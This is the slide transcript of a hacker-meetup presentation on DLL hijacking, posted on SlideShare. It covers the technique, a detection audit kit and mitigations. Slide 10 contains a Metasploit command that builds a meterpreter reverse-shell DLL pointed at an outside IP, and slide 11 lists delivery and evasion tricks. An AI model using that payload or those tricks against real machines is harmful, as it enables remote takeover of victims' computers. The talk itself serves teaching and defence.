Your SlideShare is downloading. ×
0
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Dll hijacking
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Dll hijacking

1,815

Published on

DLL Hijacking over view and demo presentation presented at the October Rochester 2600 meeting.

DLL Hijacking over view and demo presentation presented at the October Rochester 2600 meeting.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,815
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
30
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. How To Become a Hijacking Terrorist<br />DLL Hijacking for fun and profit<br />
  • 2. DLL Hijacking Overview<br />DLL Hijacking: Trick a program to use a malicious DLL instead of the normal DLL<br />HDM found that when opening a file associated to a program, the file will look in the local path for the referenced DLLs of the program before looking inside the correct location of the associated executable<br />
  • 3. PCAP Example - Normal<br />
  • 4. PCAP Example - Hijacked<br />
  • 5. DLL Hijacking<br />Old trick – new dog<br />Linux removed “.” from $PATH<br />Client side, WebDAV, or remote SMB share<br />Widely exploitable<br />Easy to detect<br />
  • 6. DLLHijackAuditKit<br />Automates the detection<br />Generates test scenarios for each file extension and automatically creates an exploitable file<br />Searches every extension<br />
  • 7. Demo<br />
  • 8. Audit.js<br />Download procmon from sysinternals<br />Opens procmon and filters for operations that begins with "IRP_MJ_" or "FASTIO_". <br />Use WMI to query the local system and file all the possible file extensions it can handle<br />Generate test cases for each file scenario. Make a dummy file with the word “Howdy…” in it named after the extension being tested<br />Automatically open each file from command line <br />While opening, log file system activity in procmon<br />Wait a few seconds and then close out the program and try the next file <br />When you get all done, you need to save the procmon file as LogFile.csv. This logfile will have the executable related to the file that was opened and also the path that it tried to look for a DLL. <br />
  • 9. Analyze.js<br />Parses the LogFile.csv for the executable and the DLL that it was looking for (wireshark.exe and airpcap.dll) <br />Generate test scenarios and copy in a dummy DLL named after the real DLL it’s looking for. <br />run the file again <br />if it is successful, the DLL will create a txt file named exploit.txt <br />Repeat this step for each EXE and DLL pair to verify which are actively exploitable<br />
  • 10. Real World Attack Scenario<br />Generate Payload: msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dll<br />Rename to the DLL that the EXE is looking for<br />Put the DLL in the same folder as a file with an associated extension<br />Deliver file and DLL<br />
  • 11. Tricks<br />Use the Hidden attribute<br />Obfuscate with lots of other files<br />MSFEncode the payload<br />Create a link to a subfolder<br />Road Apples<br />Host a SMB share on the net!<br />Create a WebDAV share<br />
  • 12. Mitigation<br />Admins:<br />Microsoft tool to catch illegal DLL references<br />http://support.microsoft.com/kb/2264107<br />CWDIllegalInDllSearch registry<br />Disable WebDAV<br />Disable outbound SMB (139 445)<br />Developers:<br />Load DLL’s securely<br />
  • 13. References<br />http://www.microsoft.com/technet/security/advisory/2269637.mspx<br />http://blog.metasploit.com/2010/08/better-faster-stronger.html<br />
  • 14. 0day (AFAIK)<br />RDP .dll<br />

×